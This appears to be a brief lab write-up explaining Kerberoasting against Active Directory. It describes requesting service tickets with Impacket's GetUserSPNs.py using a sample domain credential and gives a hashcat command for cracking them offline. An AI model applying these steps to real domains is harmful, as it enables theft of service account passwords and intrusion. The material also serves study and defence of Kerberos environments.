Kerberoasting
Kerberoasting is a technique that allows an attacker to steal the KRB_TGS ticket, that is encrypted with RC4, to brute force application services hash to extract its password. Kerberos uses NTLM hash of the requested Service for encrypting KRB_TGS ticket for given service principal names (SPNs). When a domain user sent a request for TGS ticket to domain controller KDC for any service that has registered SPN, the KDC generates the KRB_TGS without identifying the user authorization against the requested service. Therefore, attacker may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to brute force.
Enumeration
Impacket
To execute a Kerberoasting attack, we need to obtain the valid credential of an authenticated user, which in this case we have usman:uPassword@123. so we are going to use GetUserSPNs.py of impacket to request TGS for available spns.
We have retrieved TGS from the domain controller and saved it in a file.
BloodHound
We can get thesame result with bloodhound
Exploitation
With the TGS retrieved, we can proceed to crack them using hashcat.
1
2
hashcat -a 0 -m 13100 [TGS] [wordlist]
Great!. We were able to crack them.